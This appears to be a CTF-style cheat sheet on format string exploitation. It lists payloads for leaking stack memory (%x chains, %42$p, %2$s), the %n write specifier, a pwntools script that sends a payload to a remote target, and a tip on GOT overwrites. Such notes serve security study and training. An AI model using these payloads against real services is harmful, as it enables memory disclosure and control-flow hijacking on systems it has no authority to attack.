2.0 KiB
2.0 KiB
Format String
- Read and write values from stack
- axcheron's writeup
Read
- Input
%xfor every value that should be read from the stack
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
- Do long long hex reading from stack
%llx
- Select values as string, e.g. the second value
%2$s
- Another way of reading is via
%p - Read pointer on stack at offset 42
%42$p
- ir0stone's pwn-notes contains some useful pwntool scripts like this one
from pwn import *
#p = process('./vuln')
p = remote(target_ip, 9006)
payload = b'%14$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
Offset
- Read at offset as pointer value at the 42th argument on the stack
%42$s
- If the pointer at the offset references a string you can dereference by
%42$s
Length of output
- Padding of the first argument on stack to the given length
%31337x
Parameters
| Parameters | Type | Passed as |
|---|---|---|
| %d decimal (int) value | ||
| %u unsigned decimal (unsigned int) value | ||
| %x hexadecimal (unsigned int) value | ||
| %p hexadecimal (unsigned int), nice layout value | ||
| %s string ((const) (unsigned) char*) reference | ||
| %n write the number of bytes ypu put in, (*int) reference |
Tips and Tricks
- Overwrite GOT when there is no FullRELRO, when it is not read only
- Find the input argument on the stack. Write
AAAAand look out where it is placed on the stack
AAAA%6$p